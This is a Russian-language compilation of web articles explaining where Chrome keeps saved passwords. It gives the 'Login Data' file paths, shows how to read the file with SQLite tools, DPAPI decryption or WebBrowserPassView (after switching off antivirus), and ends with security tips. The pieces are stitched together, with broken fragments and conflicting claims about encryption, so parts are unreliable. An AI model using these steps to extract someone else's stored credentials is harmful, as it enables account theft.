Чем открыть login data Chrome?

В какой папке хранятся пароли google chrome

Сегодня очень много сайтов, которые требуют авторизации пользователя и при работе в Google Chrome данное правило не является исключением. Для этого вы сначала должны зарегистрироваться, а после при каждом входе постоянно подтверждать свои данные – вписывать логин и пароль.

Но разработчики Гугл Хрома внедрили функцию «Автосохранение», с помощью которой ваши персональные данные сохраняются на сервере и при попытке снова войти на один из сайтов с авторизацией, подтягивает информацию о логине и пароле, в результате чего производится автоматический вход.

Это очень удобно, не нужно каждый раз вводить свои регистрационные данные. Но если браузер сохраняет пароли, то можно ли их посмотреть и где?

Можно ли посмотреть сохраненные пароли в Гугл Хром

Пароли от разных сайтов хранятся не только в браузере, но и в системной папке Google Chrome. Первый вариант является доступным для любого пользователя, и посмотреть пароли Гугл не составит труда. Что вам нужно сделать:

1. Запустить браузер Гугл Хром.
2. Нажать на кнопку меню – три точки в правом верхнем углу.
3. Переходите в «Настройки».
4. В настройках ищете раздел «Автозаполнение», далее «Пароли».

На экране откроется окно с названиями сайтов и сохраненными паролями. Чтобы посмотреть код, нужно напротив зашифрованных точек нажать, напротив, на иконку с глазом и на месте точек отобразится пароль. Но в этой графе можно не найти всех паролей, если пользователь произвел соответствующие настройки. Полная информация о данных для входа на сайт с авторизацией лежит в системной папке, однако чтобы получить к ней доступ, нужно проделать серьезный путь.

Место хранения

Где можно найти файл с паролями, кроме сервера браузера Google Chrome? Данные о сайтах и информация для входа – логин и пароль, сохранена не только в браузере, но и на компьютере – системная папка. Как получить к ней доступ и где хранится файл с паролями? Содержимое о входе на конкретные сайты с авторизацией находится по следующему адресу:

1. Заходите в раздел «Мой компьютер».
2. Переходите на жесткий диск C.
3. Открываете папку «Пользователи» или «Users».
4. Далее выбираете снова User (по умолчанию, если не задано имя пользователя), либо папку с вашим персональным названием.
5. После переходите в «AppData», далее«Chrome», «User Data» и последняя «Default».
6. В папке «Default» нужно отыскать файл с паролями – «Login Data».

Вся информация, которая вам требуется по паролям, хранится в конечной папке – «Login Data». Однако чтобы перейти в сохраненные данные, где есть пароли от Google Chrome, вам сначала необходимо произвести соответствующие настройки, чтобы увидеть нужную папку, так как она скрыта от общего доступа. Для этого зайдите в меню Пуск, Панель управления, выберите раздел «Параметры папок» и в графе отображение поставьте галочку «Показать скрытые».

Как открыть файл с паролями в Google Chrome

Как открыть файл с паролями

Итак, вы узнали, где хранятся пароли, однако доступ получить к ним не так-то просто. Google Chrome шифрует подобные данные, используя при этом алгоритм AES. Это значит, что просто запустить файл через текстовый редактор для просмотра паролей Google Chrome не получится. Несмотря на сложность данной процедуры, шифрование данных Google Chrome позволяет создать высокий уровень безопасности при краже конфиденциальной информации. Итак, чтобы открыть файл «Login Data», вам сначала нужно скачать специальную утилиту для считывания – программа DB Browser for SQLite.

После того как вы установите SQLite, запускаете программу, нажимаете на кнопку «Открыть базу данных» и выбираете, какой файл вы хотите загрузить для прочтения. Это Login Data, по ранее описанному пути, через системную папку «Google Chrome». Когда файл распакуется в этой программе, вам для просмотра станет доступна таблица, со следующими данными:

• Origin_url – адрес сайта;
• Username_value – логин;
• Password_value – пароль.

После просмотра нужных сведений вы можете удалить программу, а можете ее оставить для использования в будущем, если снова забудете, каким ключом засекретили вход на тот или иной сайт.

Вот так просто вы сможете просмотреть необходимые пароли, которые используете в браузере Гугл Хром. Как вы поняли, они хранятся в колонке под названием «Password_value». Не стоит применять данную инструкцию ко всем браузерам, она работает только с Google Chrome. Если вы не нашли какие-то пароли и сайты, то это может обозначать только одно – данные сведения не сохранятся по причине их высокой безопасности, например, от банковских сайтов, клиент-банков, корпоративных серверов.

Процедура экспорта

Через стандартные настройки Google Chrome, можно не только посмотреть сохраненные пароли от разных сайтов, но и экспортировать их. Очень удобная функция, выполнить которую можно при помощи следующих действий:

1. Запускаете браузер.
2. Переходите в «Настройки», через три вертикальные точки вверху справа.
3. Открываете раздел «Автозаполнение», далее пункт «Пароли».
4. В графе «Сохраненные пароли», напротив, имеется кнопка с доступными функциями (три вертикальные точки), нажимаете на нее и выбираете «Экспортировать».
5. Теперь останется только указать место на компьютере, куда сохранить файл с данными.

Пароли сохраняются в файле формата csv. Открыть данный файл можно любым текстовым документом, но удобнее всего для этих целей использовать Excel.

Вот так просто не только узнать, где хранятся пароли, но и посмотреть их. Подобная возможность может вас выручить, если вы хотите зайти в свою учетную запись на другом устройстве и забыли пароль. Однако будьте очень осторожны с подобными действиями, так как перенос паролей в доступное место может быть использован третьими лицами. Поэтому ответственно относитесь к данной инструкции и воплощайте ее в действие только если уверены в безопасности переноса данных.

Источник: https://google-chromes.ru/gde-xranyatsya-soxranennye-paroli-v-google-chrome.html

Где хранятся пароли в браузере Google Chrome

Сохраненные пароли Chrome автоматически запоминает в веб-браузере Chrome, чтобы помочь вам восстановить потерянный пароль к любой учетной записи, если вы его забыли. Пользователи Chrome могут легко получить список всех имен пользователей и паролей, сохраненных в их браузере, используя любой из методов, описанных ниже. Если ваша учетная запись Google синхронизирована на нескольких устройствах, вы можете открыть веб-браузер Chrome на ноутбуке, планшете или телефоне, чтобы узнать, где находятся сохраненные пароли в Chrome.

Сохраненные пароли Google Chrome хранятся в вашем браузере, чтобы сделать серфинг в интернете и интернет-магазинах проще. Автоматическое сохранение паролей — это дополнительная функция, которая делает использование интернета менее утомительным.

Тем не менее, это может представлять угрозу безопасности для тех, кто делится или путешествует со своим ноутбуком или мобильным устройством. Легко увидеть чьи-то пароли Chrome, как только у вас есть пароль системы пользователя или учетной записи Google.

Если на устройстве нет никакой безопасности – например, биометрического логина или пароля, — то еще проще просматривать сохраненные пароли Chrome.

Если Вы делите свой компьютер или мобильное устройство с кем-то еще, то лучше всего не позволять Chrome сохранять ваши пароли и управлять ими. Вместо этого попробуйте использовать приложение для ввода пароля. Приложение Password Keeper поможет вам установить уникальный пароль для каждой учетной записи в интернете и надежно хранить его.

Прежде, чем приступать к каким-то действиям, рекомендуем скачать последнюю версию браузера Google Chrome. В новых версиях программы улучшают скорость и стабильность работы.

https://www.youtube.com/watch?v=33Drtm2lILU

Несмотря на то, что Chrome может хранить платежную информацию, для каждой покупки по-прежнему требуются трех-или четырехзначные коды безопасности CVV кредитной карты. Помните, что ваше мобильное устройство и ноутбук могут синхронизировать регистрационную информацию между устройствами. Это параметр безопасности в Chrome.

Если они синхронизированы, то ваши пароли доступны на всех устройствах, использующих один и тот же аккаунт Google. Если какое-либо устройство не защищено паролем, то все сохраненные пароли можно увидеть.

С другой стороны, если вы получили блокировку на одном устройстве, как ваш ноутбук, то попытка другого синхронизированного устройства, как ваш телефон, может дать вам необходимый доступ.

Chrome хранит пароли

Как управлять паролями в Chrome

В Chrome появится всплывающее окно с предложением сохранить ваши имя пользователя и пароль для посещаемых вами сайтов. Chrome также может сохранять платежную информацию.

Если вы разрешите Chrome сохранять пароли, то при следующем посещении этого веб-сайта ваши регистрационные данные будут автоматически заполнены, и вам не придется повторно вводить учетные данные. Если вы используете Chrome для управления платежной информацией, то для завершения покупки вам понадобится только код безопасности CVV с вашей кредитной карты.

Если вы храните свою платежную информацию на сайте электронной коммерции, то вам, возможно, не придется вводить что-то еще для покупки. Все это делает покупки в интернете легче, но и более рискованными.

Как найти файл пароля Chrome на жестком диске

Чтобы просмотреть пароли Chrome, сохраненные на вашем ноутбуке или устройстве, вам нужно перейти в файловую систему ноутбука, открыть Chrome или перейти в менеджер паролей Google.

• Ваш файл паролей Google Chrome находится на вашем компьютере по адресу C:\Users\$username\AppData\Local\Google\Chrome\User Data\Default.
• Ваши пароли сохранены в файл Login Data.
• Замените $username на имя пользователя Windows при переходе к этому файлу в файловой системе на вашем ноутбуке или компьютере.

Здесь вы можете найти URL-адреса веб-сайтов, которые вы посетили. Адреса электронной почты, используемые для входа на эти веб-сайты, сохраняются в этом файле, и многие из них находятся в открытом доступе. Это означает, что любой, кто найдет этот файл, может легко получить логин от почты с помощью любого текстового редактора, например, с помощью Блокнота. Пароли зашифрованы. Таким образом, взлом вашего пути к этому файлу дает вам половину информации, необходимой для входа в чей-то онлайн-аккаунт.

Файл с паролями Google

Как найти сохраненные пароли Chrome? – Windows

Чтобы просмотреть сохраненные пароли, откройте Chrome, введите chrome://settings в адресной строке и нажмите enter. Если вы используете учетную запись Google с другим браузером, например, Firefox, то сделайте тоже самое. Выберите «Пароли» в верхней части первого раздела страницы.

Сохраненные пароли в браузере Chrome

• Откройте Chrome на своем ноутбуке или компьютере
• Нажмите на три вертикально расположенные точки в правом верхнем углу экрана Chrome
• В раскрывающемся меню выберите пункт Настройки
• Выберите “Пароли” из первого раздела

Чтобы просмотреть пароль для каждого сайта, выберите значок глаза.

Chrome запросит у вас пароль пользователя Windows, если вы его используете. Ваш пароль пользователя — это тот, который вы используете при входе в компьютер, когда включаете его или пробуждаете от сна. Если у вас нет пароля пользователя на вашем компьютере, то ваши пароли могут быть показаны без какой-либо дополнительной информации.

Менеджер паролей Google Chrome

В этом разделе вы можете удалить сохраненный пароль из Chrome. Таким же способом вы можете посмотреть сохраненные пароли. Вы можете выбрать, будет ли Chrome запоминать учетные данные для входа. Это разрешение устанавливается на основе отдельного сайта. Независимо от того, будет ли Chrome каждый раз предлагать вам сохранить свой пароль, это еще один параметр, который можно отключить для большей безопасности. Если вы решите сохранить пароли с веб-сайта, Google Chrome автоматически заполнит поля входа при следующем посещении этого сайта.

Скриншот пароли в мобильном Chrome

Менеджер паролей Google на Android

1. Нажмите на три вертикально расположенные точки в правом верхнем углу экрана
2. В меню выберите пункт Настройки
3. Выберите Пароли
4. Нажмите «Просмотр и управление сохраненными паролями в Вашем аккаунте Google”
5. Chrome запросит у вас пароль вашего аккаунта Google

Чтобы просмотреть пароль для каждого веб-сайта, выберите значок глазного яблока рядом с каждым веб-сайтом.

Источник: https://FlaPler.com/google-chrome/where-are-my-saved-passwords-in-chrome/

Как открыть login data chrome. Где хранятся пароли в Google Chrome. Защита сохраненных паролей

Здравствуйте!

Не так давно у меня возникла идея о создании своей личной программы для бэкапа паролей Google Chrome. Да, в интернете очень много подобных программ, но результат паранойи (что пароли сливаются на чей то сервер «про запас»), да и желание узнать, чем дышит любимый браузер — перевесили чашу весов.

Рассказывать буду на основе ОС Windows 7.

Начну с того — где хранится файл с паролями. Этот файл — «Login Data» в папке «C:\Users\SomeUser\AppData\Local\Google\Chrome\User Data\Default\».

Это база данных SQLite.

В ней есть 14 колонок. Нас же интересуют только 3: origin_url (ссылка на сам сайт), username_value (логин), password_value(пароль). Среди других колонок есть так же: страница авторизации, название элемента ввода для логина и пароля и другие. Все данные незашифровыванны(видно на скрине), кроме поля password_value.
В поле с паролем находится байтовый массив. Выглядит он следующим образом.

Способ шифрования выбран очень удобный для разработчиков. Они использовали Data Protection Application Programming Interface (), который использует Windows.
Подробнее информация в ссылке, тем более эта система шифрования заслуживает отдельной темы. Вкратце скажу, что эта система работает в одном из 2 режимов.

1. С использованием машинного ключа.
   Ключ уникален для текущей системы. Но он позволяет разным программам работать с зашифрованными данными без передачи ключа друг — другу, но исключая утечку данных за пределы машины, а точнее пользователя.
2. С использованием ключа пользователя.
   Без комментариев.

Так же стоит отметить, что эту систему безопасности использует всем известный IE версии 7 и старше. Защита в ней устроена ещё на порядок выше, чем у Google Chrome. Там используется вдобавок ещё и энтропия, а в качестве хранилища — используется реестр. Разработчики Microsoft»а приятно удивили.

В конце статьи есть исходный код программы. Основные её моменты мы сейчас разберем.

Итак — начнем!

Нам будет необходимо считать байты поля с паролем, так как хранится пароль именно в байтовом массиве. Для этого я использовал System.Data.SQLite Interop Library версии 1.0.65.0 (есть в архиве).
В проекте использован класс DPAPI, который был найден в интернете. На момент создания проекта не было цели написания статьи, так что автор класса утерян, но снимаю перед ним шляпу — работа проделана серьезная.

Объявим нужные нам объекты и переменные:

Теперь осталось только вытащить нужную информацию из неё и записать в файл. На этом этапе файл уже не используется — работа ведется только с объектом DataTable:

В итоге у нас есть HTML-документ с нашими логинами-паролями, которые можно хранить на своем мобильном телефоне, или распечатать и положить в конверт… При желании можно записывать больше полей, но лично мне хватает выше упомянутых трех.

Если есть вопросы — с удовольствием отвечу. Большое спасибо за внимание!

P.S.Если у Вас 64-битная операционная система, то Вам следует заменить файл библиотеки на тот, что находится в корневой папке архива. Я не гарантирую, что данная программа будет работать на Windows XP, или других ОС. Так как проверялось только на Windows 7.

Но все же для большинства пользователей выбор однозначен — и это «Гугл Хром». Основные преимущества данного веб-обозревателя — высокая скорость загрузки страниц, множество приятных дополнений для браузера и, конечно, интуитивно понятный интерфейс.

Однако не все пользователи разобрались с некоторыми тонкостями настройки Chrome. Например, есть «юзеры», которые не знают где в «Гугл Хром» хранятся пароли, как их посмотреть и извлечь в случае необходимости. А раз появляются такие вопросы, значит необходимо дать на них ответы, ведь зачастую новичкам тяжело разобраться самостоятельно даже с, казалось бы, очевидными вещами. Именно поэтому далее речь пойдет о том, «Гугл Хром», где они хранятся.

Зачем сохранять пароли в браузере

Если пользователь обеспокоен безопасностью информации, хранящейся на тех или иных ресурсах, то, скорее всего, он знает об одном очень полезном совете от опытных «юзеров» интернета. В рекомендации сказано, что для каждого сайта необходимо придумать отдельный и желательно сильный пароль. Нетрудно догадаться, зачем — если вдруг вас «взломают», например, в одной из социальных сетей, то этот же пароль не подойдет для других ресурсов («вебмани», почта, собственный блог).

Однако здесь есть и негативный момент. Все придуманные пароли понадобится куда-то записывать, так как запомнить их будет очень сложно. Вам понадобится иметь отличную, если не сказать феноменальную память.

Вот почему браузер предлагает вам сохранить пароли. Воспользовавшись этой опцией, при следующем входе на выбранный сайт вам не нужно будет вновь указывать действующий пароль. Но и в этом случае есть свои «минусы», и вы узнаете о них в процессе прочтения статьи.

Где в «Гугл Хром» хранятся пароли от часто посещаемых сайтов

Итак, где же все-таки посмотреть сохраненные пароли в браузере Chrome? На самом деле найти их можно достаточно просто. Для этого понадобится воспользоваться предложенным алгоритмом действий:

Запустите веб-обозреватель и откройте его меню, кликнув по кнопке с тремя параллельными полосками (сверху, в правом углу).Обратитесь к пункту «Настройки», после чего прокрутите страничку вниз и кликните «Показать дополнительные настройки».Здесь вас интересует подраздел «Пароли и формы». Проверьте, чтобы чекбокс был установлен рядом с опцией «Предлагать сохранять пароли» и щелкните «Настроить».

В результате этих нехитрых действий откроется менеджер паролей Google Chrome. В левой части вы увидите названия сайтов, посередине — логины, справа — секретные комбинации символов.

Как видите, найти сохраненные пароли в «Гугл Хром» очень легко. Стоит отметить, что некоторые «юзеры» как раз на это и жалуются, так как переживают за сохранность своей конфиденциальной информации.

Как посмотреть пароль

Итак, вы уже знаете, где хранятся пароли «Гугл Хром», однако вместо набора символов вы видите точки, за которыми скрыта используемая вами комбинацию цифр и букв. Как же увидеть сам пароль? Ведь иногда его нужно извлечь, чтобы вставить в другой браузер.

На самом деле, сделать это очень просто. Подведите курсор к сайту, пароль от которого вы хотите посмотреть, и кликните ЛКМ по этим самым точкам. Появится небольшое поле и кнопка «Показать». Щелкнув по ней, вы увидите пароль от сайта. Его можно скопировать и вставить в любой другой веб-обозреватель. Кроме того, если вы не желаете, чтобы в менеджере паролей Chrome сохранились эти данные, кликните по крестику справа, и пароль исчезнет из памяти браузера.

Вот и все! Теперь вы узнали, где в «Гугл Хром» хранятся пароли, как их увидеть и извлечь для последующего использования в другом браузере.

Прежде чем принимать решение относительно в веб-обозревателе, рекомендуется ознакомиться с советами опытных пользователей:

К каждому сайту придумайте отдельный уникальный пароль. Если у злоумышленника получится зайти в вашу учетную запись, например, в какой-нибудь игре, то он не сможет проникнуть на другие сервисы под вашим аккаунтом, так как пароли будут отличаться.Не храните в браузере пароли от электронных кошельков, почты и других сайтов, на которых вы держите важную информацию.Если вы не хотите записывать пароли в блокнот и потом тратить время на их поиск, воспользуйтесь одним из приложений, например, LastPass. В результате вам понадобится запомнить лишь одну комбинацию символов, а вход на любимые сайты будет осуществляться без ввода логина и пароля.

Заключение

Итак, теперь, когда вы узнали, где в «Гугл Хром» хранятся пароли, у вас есть возможность посмотреть их и извлечь, если возникнет необходимость. При желании вы можете отключить опцию, отвечающую за сохранение паролей. Кстати, это рекомендуется делать, например, на ПК, установленном в офисе, ведь ваш коллега легко сможет увидеть и скопировать все ваши секретные комбинации символов, если, конечно, он опытный «юзер».

Несмотря на то, что действительно удобных и функциональных браузеров насчитывается не так уж и много, да что там, их можно пересчитать по пальцам, разработчики каждого обозревателя стараются сделать их еще более совершенными. Их действия направлены на то, чтобы пользователям было максимально комфортно пользоваться веб-браузером, и чтобы все его функции отвечали требованиям юзера.

Google Chrome – яркий пример того, как надлежит выглядеть хорошему и удобному браузеру, его используют миллионы пользователей по всему миру. И каждый хоть раз, но забывал пароль от того или иного сайта. Для таких целей в Хроме предусмотрена специальная функция запоминания пароля: нужно лишь один раз подтвердить свое решение, после чего браузер запоминает пароль, и при следующем посещении веб-страницы больше не нужно его вводить. Но где хранятся пароли в гугл хром? Давайте разбираться вместе.

Сохраненные пароли в Хроме

Итак, у вас возникла необходимость посмотреть пароль от какого-либо сайта, сохраненного ранее. Дело в том, что пользователь, в силу того, что он не должен каждый раз вводить пароль, со временем его забывает, и это нормально. Сложности начинаются, когда ему, скажем, нужно зайти на тот же ресурс, но с другого браузера или компьютера, а вспомнить нужную комбинацию никак не получается. И если вы тоже в письмах нужные данные вы не нашли.

Так как посмотреть пароли в гугл хром? Переходим от теории к практике! Для начала зайдите в настройки веб-браузера, кликнув на кнопку с тремя параллельными линиями правее от адресной строки. В выпавшем контекстном меню ищите строчку «Настройки», нажимайте на нее. Перед вами откроется новое окошко, вам необходимо опуститься в самый низ и кликнуть «Показать дополнительные настройки». Теперь ищите категорию «Пароли», а в ней – «Управление паролями».

Снова откроется новое окно, в котором будет две колонки. С левой стороны – сайты, на которые вы заходили, и давали соглашение на сохранение пароля. С правой же стороны будет указан непосредственно сам пароль. По такой же методике вы можете .

в помощь:

Сохранение паролей в браузере – удобна функция, она позволяет не вводить пароль при каждом заходе на сайт. Но, если пароль не нужно вводить каждый раз, то он довольно быстро забывается. Если вы столкнулись с подобной проблемой, то данная статья должна вам помочь. Сейчас мы максимально подробно расскажем о том, где хранятся пароли в и как их оттуда извлечь.

Шаг № 1. Откройте настройки Google Chrome.

Первое что необходимо сделать, это открыть настройки Google Chrome. Для этого нужно нажать на кнопку в верхнем правом углу браузера и выбрать пункт «Настройки». Также вы можете открыть настройки при помощи команды «chrome://settings/». Ее нужно ввести в адресную строку браузера.

Шаг № 2. Найдите раздел настроек под названием «Пароли и формы».

Далее вам нужно найти раздел настроек «Пароли и формы». Для этого пролистайте страницу с настройками в самый низ и нажмите на ссылку «Показать дополнительные настройки». После этого внизу страницы появятся дополнительные настройки. Там же будет и раздел «Пароли и формы».

Шаг № 3. Откройте настройки сохраненных паролей.

Шаг № 4. Найдите нужный вам пароль.

Для того чтобы найти нужный пароль воспользуйтесь поисковой формой, которая находится в верхнем правом углу. Например, для того чтобы узнать пароль от роутера введите в поиск его адрес.

Для того чтобы увидеть сохраненный пароль выделите нужную строчку в списке и нажмите на кнопку «Показать».

Если вы столкнулись с ситуацией, когда у вас не работает Windows, но нужно вытянуть и сохранить пароли от Google Chrome, рекомендуем ознакомиться со следующими рекомендациями. Только изначально отметим, что вы должны иметь возможность попасть в Windows из-под LiveCD или любым другим способом (иными словами, получить доступ к файловой системе). В противном случае, вытащить пароль не удастся.

Где в Google Chrome хранятся пароли пользователя?

Браузер Google Chrome сохраняет все пароли в отдельную папку. В зависимости от версии операционной системы путь к данной директории может быть разный. Приведем примеры:

• Windows ХР: C:\Documents And Settings\Папка с вашем именем пользователя\Local Settings\Application Data\Google\Chrome\ (если имеется папка User Data, то выбираем её или Default);
• Windows Vista: C:\Users\Папка с вашем именем пользователя\AppData\Local\Google\Chrome\User Data\Default;
• Windows 7: C:\Users\Папка с вашем именем пользователя\AppData\Local\Google\Chrome\User Data\Default;
• Windows 8: C:\Users\Папка с вашем именем пользователя\AppData\Local\Google\Chrome\User Data\Default;
• Mac OSX: ~/Library/Application Support/Google/Chrome/Default;
• Linux: ~/. config/google-chrome/Default;
• Chrome OS: /home/chronos/.

Это пути к папкам, где хранятся пароли пользователя для различных сайтов, при условии, что юзер сохранял их через форму «Сохранить пароль».

В папке браузера будет файл Login Data. Он представляет собою SQLite базу данных в виде таблицы. В ней будет несколько столбцов. Первый – сайт, второй – логин, третий – пароль и т д.

Источник: https://crmnetsurfing.ru/kak-otkryt-login-data-chrome-gde-hranyatsya-paroli-v-google-chrome-zashchita-sohranennyh.html

Где хранятся и как посмотреть сохраненные пароли в Гугл Хром

Все современные браузеры ориентированы на удобство использования, а одним из основных инструментов повышения комфорта является функция сохранения ключей доступа к сайтам. Нам не приходится запоминать все данные для авторизации, ведь веб-обозреватель хранит их и подставляет в подходящий момента на нужном сайте.

Аналогично себя ведёт и Гугл Хром, в нём хранятся сохранённые пароли, их можем в любой момент посмотреть одним из нескольких доступных способов (встроенными и сторонними инструментами).

Цель сегодняшнего материала – рассказать об особенностях менеджера паролей, показать варианты работы с ключами и слегка затронуть файл с кодами доступа.

Как работает сохранение паролей в Гугл Хром

Принцип работы функции следующий:

1. Переходим на страницу авторизации на любом сайте.
2. Вводим данные для входа в аккаунт и жмём на кнопку «Войти».
3. Под адресной строкой справа появляется сообщение «Сохранение пароля». Если нажимаем кнопку «Сохранить», логин с паролем записывается в базу данных браузера.

В момент следующего входа ключи автоматически подтягиваются из веб-обозревателя и подставляются в соответствующее поле.

https://www.youtube.com/watch?v=upShLELFYa8

Если соглашаемся с занесением данных для входа в браузер, теперь они там хранятся всё время. При желании появляется возможность посмотреть ключи от всех сайтов. Правда, не всегда реально узнать сохранённые пароли в Google Chrome. Существует пара условий, обязательных для отображения содержимого раздела с кодами доступа.

Когда возможно и невозможно посмотреть пароли в Гугл Хром

Просмотр пароля возможен в большинстве случаев, ведь такую возможность заложили сами разработчики Google. Однако, есть исключения из правила, тогда посмотреть пароли в Гугл Хром не получится. Если конкретной ситуации нет в списке, все ключи доступа можем прочитать.

Случаи, в которых недоступен просмотр паролей в Гугл Хром:

• Отсутствует доступ к системе, в которой установлен браузер. Если нет прямого или виртуального доступа к ОС, узнать интернет-пароли не получится. И это хорошо, ведь значительно повышает конфиденциальность пользователей. Вряд ли кто-то хочет, чтобы его пароли были доступны посторонним лицам.
• Неизвестен ключ авторизации. Для отображения паролей в Гугл Хром нужен код доступа к системе, если в ней стоит блокировка.
• Пароли были удалены. Их восстановить в целом реально, но на практике редко удаётся. Единственный рабочий метод – воспользоваться функцией отката Windows.

• Коды доступа не были сохранены. Узнать ключ можем только через средство восстановления пароля на сайте или найти записи с данными: на почте, в блокноте и т.п.
• Каталог, где сохраняются пароли в Гугл Хром, защищён паролем или полностью скрыт через специальное ПО. Без устранения средства защиты узнать содержимое не получится.

Если применены средства блокировки, защиты или удаления, посмотреть запомненные пароли в Google Chrome невозможно (за редкими исключениями). В остальных случаях никаких препятствий нет.

Как посмотреть сохранённые пароли в Google Chrome

Официально разрешённый и самый доступный способ отображения всех данных для входа подразумевает использованием диспетчера паролей в Google Chrome. Это специальная вкладка для управления и отображения внесённых кодов доступа для сайтов. Она доступна и на ПК, и на смартфоне.

Важно! Если вход в систему заблокирован ключом доступа, его придётся вводить и для разблокировки отображения паролей в Гугл Хром.

Как в Google Chrome посмотреть сохранённые пароли:

1. Нажимаем на изображение бургера (3 полоски) в правом верхнем углу.
2. Переходим на страницу «Настройки».
3. В графе «Автозаполнение» нажимаем на строку «Пароли». Кстати, сразу перейти на нужную страницу можем по ссылке chrome://settings/passwords
4. Все данные представлены в виде таблицы: домен сайта, логин и пароль. Дальше отображается несколько кнопок действий. Чтобы отобразить код, нажимаем на изображение глаза «Показать пароль».
5. Вводим ключ доступа во всплывающее окно.

Сейчас Гугл Хром позволяет посмотреть сохранённые пароли без каких-либо ограничений. Чтобы заставить веб-обозреватель показать содержимое, достаточно нажать на «глаз» в интересующей строке с названием сайта и пароль мгновенно отобразится.

Как узнать пароли Google Chrome Android

Найти сохранённые пароли в Гугл Хром на Андроид можем практически таким же методом, но с небольшими отличиями в отношении разблокировки и местонахождения диспетчера паролей.

Как посмотреть пароли в браузере Гугл Хром на телефоне Android:

1. Открываем приложение с браузером от Гугла.
2. Жмём на три точки (расположены под индикатором уровня батареи).
3. Идём на страницу «Настройки».
4. Нажимаем на ссылку «Пароли». Здесь располагается весь список ключей для авторизации.
5. Касаемся любого из перечисленных элементов с названиями веб-сайтов.
6. В строке «Пароль» жмём на изображение глаза.
7. Вводим графический ключ, PIN-код или прикладываем палец к сканеру отпечатка пальца в зависимости от требований телефона и выбранного инструмента защиты.

Где хранятся пароли Гугл Хром на компьютере

Все данные на компьютере записываются в соответствующие файлы. В большей части случаев они недоступны для чтения, а предназначены для обработки программой. Иными словами, представляют ценность только в условиях одной рабочей среды (браузера). Так же само и с паролями в Гугл Хром, браузер их хранит в отдельном файле. По умолчанию он размещён в папке с данными веб-обозревателя. В случае активации синхронизации, браузер может извлечь пароли и переместить их на сервер в качестве дубликата.

https://www.youtube.com/watch?v=aLiu08G7Syc

Расположение файла — C:\Users\Имя ПК\AppData\Local\Google\Chrome\User Data\Default. Называется он Login Data. Файл не имеет расширения и отображается в виде белой иконки (как неопознанный объект).

Можно ли прочесть файл с паролями Google Chrome

Есть хорошая новость, файл, где хранятся пароли в Google Chrome, является базой данных. Это означает, что его можем открыть. Вот только для запуска нужна специальная программа. Тематическое приложение несложно найти на просторах сети. Однако, неопытному пользователю будет тяжело разобраться с установкой и способом работы подобных утилит. Всё потому, что большая часть программ работают через консоли.

Если попытаться вытащить пароли из файла Google Chrome при помощи подобного софта, возникает следующая трудность – блокировка. К примеру, DB Browser for SQLite отображает ошибку «database is locked». Файл заблокирован и ввести пароль не представляется возможным. Большая часть программ для открытия баз данных выдают подобную ошибку.

Выход есть – специальное приложение WebBrowserPassView. Оно элементарно в использовании и позволяет автоматически найти сохранённые пароли в Гугл Хром без ручного поиска файлов.

Как найти и увидеть пароли в Гугл Хроме:

1. Временно отключаем антивирус. У всех программ действия немного отличаются, но суть остаётся той же. На нашей рабочей машине установлен Avast, поэтому за пример берём его.
   1. Открываем трей с программами (стрелка в правой нижней строке).
   2. Нажимаем ПКМ по значку Avast.
   3. Наводим курсор на «Управление экранами Avast» и выбираем «10 минут».
2. Скачиваем программу WebBrowserPassView с сайта.
3. Распаковываем архив, полученный после выполнения прошло этапа.
4. Запускаем утилиту с помощью файла WebBrowserPassView.exe. В основном окне можем увидеть пароли в Гугл Хром.

Как создать удобочитаемый файл, где хранятся пароли в Гугл Хром

В менеджере паролей в Гугл Хром находится один полезный инструмент для переноса ключей доступа к сайтам между утилитами. Его также можем использовать для создания файла в формате csv – таблица. Её можно открыть разными редакторами, в частности Excel. Внутри содержатся строки с доменами сайтов, логинами и интернет-паролями, разделённые запятыми. Речь идёт об экспорте паролей Google Chrome.

Как создать и посмотреть файл, где браузер Гугл Хром хранит пароли:

1. Нажимаем на иконку меню и переходим в «Настройки».
2. Открываем раздел «Пароли».
3. Справа от записи «Сохранённые пароли» жмём на изображение действия и выбираем «Экспорт паролей».
4. Открываем сгенерированный файл. Если после двойного клика Windows просит указать программу-обработчик, выбираем Excel или другой редактор таблиц.

Управление паролями в Google Chrome

Довольно часто нам нужно не только узнать сохранённый пароль в Гугл Хром, но и выполнить некоторое его редактирование или изменить принцип работы службы. Данный раздел даст представление о нескольких основных инструментах по работе в Google Chrome с «password`ами».

Варианты действий:

• Выключение автозаполнения. По умолчанию браузер самостоятельно находит пароли в Гугл Хром и пытается их извлечь из базы, чтобы вставить в поля авторизации. Можем отключить эту функцию. Для этого идём на страницу «Пароли» по ссылке chrome://settings/passwords. Переключаем тумблер «Автоматический вход» в выключенное положение.
• Изменение логина или пароля. Отредактировать можем прямо в момент заполнения поля. Достаточно нажать на изображение ключа в правой стороне адресной строки, нажать на иконку глаза и ввести корректный пароль.
• Выключение сохранения паролей. Если разубедились в безопасности того, как Google Chrome хранит пароли, можем деактивировать функцию. В таком случае сохранять и извлекать данные для авторизации придётся вручную. Данная функция расположена по ссылке chrome://settings/passwords и называется «Предлагать сохранение паролей». Выключаем её кликом по переключателю рядом.

Стоит ли пользоваться менеджером паролей в Гугл Хром

Место, где находятся пароли Гугл Хром – лакомый кусочек для всевозможных злоумышленников. На него постоянно охотятся, пытаясь внести в систему вирусы, перехватить данные, заставить пользователя самостоятельно позволить воспользоваться его компьютером и т.д. Каждый, кто получает доступ к менеджеру паролей, может узнать всё его содержимое в Гугл Хром. Это грозит взломом всех аккаунтов, в том числе банковских или профилей в платёжных системах.

Предлагаем взвесить все за и против использования функции сохранения введённых паролей.

причина отказа от менеджера паролей – недостаточный уровень защищённости в сети.

Как защититься от взлома паролей через Google Chrome

Условно все причины взлома можем разделить на 2 группы:

• Человеческий фактор. Мы сами позволяем близким узнать пароли в Google Chrome проявляя невнимательность или говоря свой ключ доступа к системе. Лучше придерживаться правила «доверяй, но проверяй». Выдавая лишнюю информацию и позволяя полноправно пользоваться компьютером, мы сами себя подвергаем рискам. Стоит научить близких уважать личное пространство, а к особо настырным друзьям – присмотреться вдвое больше, может это и вовсе не друг.
• Технический взлом. Сюда относятся всевозможные вирусы, риски перехвата данных и прочее. На самом деле острота и опасность нежелательной активности в сети слишком преувеличена. Достаточным уровнем безопасности можем считать наличие свежего антивируса, соблюдение осторожности в интернете при сёрфинге (особенно при скачивании файлов) и использование домашней, зашифрованной сети.

Как поставить пароль на браузер Google Chrome

